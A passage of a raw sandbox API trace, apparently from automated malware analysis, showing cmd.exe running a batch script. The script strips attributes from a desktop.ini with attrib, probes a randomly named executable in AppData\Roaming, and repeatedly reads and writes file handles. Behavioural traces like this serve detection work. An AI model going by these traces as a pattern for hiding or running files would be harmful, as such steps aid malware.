8 [0220.936] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.936] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.936] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.936] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.936] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.936] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af500 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.936] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af500, lpFilePart=0x2af4fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x2af4fc*="Desktop") returned 0x18 [0220.936] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.937] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af27c | out: lpFindFileData=0x2af27c) returned 0x330c38 [0220.937] FindClose (in: hFindFile=0x330c38 | out: hFindFile=0x330c38) returned 1 [0220.937] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af27c | out: lpFindFileData=0x2af27c) returned 0x330c38 [0220.937] FindClose (in: hFindFile=0x330c38 | out: hFindFile=0x330c38) returned 1 [0220.937] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af27c | out: lpFindFileData=0x2af27c) returned 0x330c38 [0220.937] FindClose (in: hFindFile=0x330c38 | out: hFindFile=0x330c38) returned 1 [0220.937] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.937] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.937] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.937] GetEnvironmentStringsW () returned 0x330458* [0220.938] FreeEnvironmentStringsW (penv=0x330458) returned 1 [0220.938] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.938] GetConsoleOutputCP () returned 0x1b5 [0220.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.938] GetUserDefaultLCID () returned 0x409 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af640, cchData=128 | out: lpLCData="0") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af640, cchData=128 | out: 
lpLCData="0") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af640, cchData=128 | out: lpLCData="1") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.940] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.941] GetConsoleTitleW (in: lpConsoleTitle=0x320a98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.941] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.941] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.941] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.941] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.942] _wcsicmp 
(_String1="attrib", _String2=")") returned 56 [0220.942] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0220.942] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0220.942] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0220.942] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0220.942] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0220.942] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0220.944] _wcsicmp (_String1="del", _String2=")") returned 59 [0220.944] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0220.944] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0220.944] _wcsicmp (_String1="IF", _String2="del") returned 5 [0220.945] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0220.945] _wcsicmp (_String1="REM", _String2="del") returned 14 [0220.945] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0220.947] _wcsicmp (_String1="type", _String2=")") returned 75 [0220.947] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0220.947] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0220.947] _wcsicmp (_String1="IF", _String2="type") returned -11 [0220.947] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0220.947] _wcsicmp (_String1="REM", _String2="type") returned -2 [0220.947] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0223.044] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0223.044] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.050] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0223.051] FindClose (in: hFindFile=0x330638 | out: hFindFile=0x330638) returned 1 [0223.052] FindClose (in: hFindFile=0x330638 | out: 
hFindFile=0x330638) returned 1 [0223.052] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0223.052] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0223.052] GetConsoleTitleW (in: lpConsoleTitle=0x2af068, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.052] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeef0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aefb8 | out: lpAttributeList=0x2aeef0, lpSize=0x2aefb8) returned 1 [0223.052] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeef0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aefb0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeef0, lpPreviousValue=0x0) returned 1 [0223.052] GetStartupInfoW (in: lpStartupInfo=0x2aeeac | out: lpStartupInfo=0x2aeeac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0223.052] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0223.053] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef4c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef98 | out: lpCommandLine="attrib -r -s -h 
\"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessInformation=0x2aef98*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd2c, dwThreadId=0xd10)) returned 1 [0223.061] CloseHandle (hObject=0x4c) returned 1 [0223.061] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.061] GetEnvironmentStringsW () returned 0x330878* [0223.061] FreeEnvironmentStringsW (penv=0x330878) returned 1 [0223.061] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0223.241] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee8c | out: lpExitCode=0x2aee8c*=0x0) returned 1 [0223.241] CloseHandle (hObject=0x50) returned 1 [0223.241] _vsnwprintf (in: _Buffer=0x2aefd4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee98 | out: _Buffer="00000000") returned 8 [0223.241] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0223.241] GetEnvironmentStringsW () returned 0x332598* [0223.241] FreeEnvironmentStringsW (penv=0x332598) returned 1 [0223.241] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.241] GetEnvironmentStringsW () returned 0x332598* [0223.241] FreeEnvironmentStringsW (penv=0x332598) returned 1 [0223.241] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeef0 | out: lpAttributeList=0x2aeef0) [0223.241] GetConsoleTitleW (in: lpConsoleTitle=0x2af270, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\desktop.ini")) returned 0xffffffff [0223.242] GetLastError () returned 0x2 [0223.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki")) returned 0x10 [0223.242] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0223.242] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0223.242] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\desktop.ini")) returned 0xffffffff [0223.243] GetLastError () returned 0x2 [0223.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2aed1c | out: lpConsoleScreenBufferInfo=0x2aed1c) returned 1 [0223.243] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0223.245] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0223.245] GetConsoleTitleW (in: lpConsoleTitle=0x2af20c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.246] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0223.246] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.247] GetFileType (hFile=0x50) returned 0x1 [0223.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.247] GetFileType (hFile=0x50) returned 0x1 [0223.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.247] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, 
lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] GetFileType (hFile=0x50) returned 0x1 [0223.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.249] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, 
lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.250] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.250] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.250] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.251] GetFileType (hFile=0x50) returned 0x1 [0223.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.252] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.252] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] GetFileType (hFile=0x50) returned 0x1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.252] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 
[0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] GetFileType (hFile=0x50) returned 0x1 [0223.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.253] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.254] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.254] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, 
lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] GetFileType (hFile=0x50) returned 0x1 [0223.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.254] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] GetFileType (hFile=0x50) returned 0x1 [0223.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.255] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: 
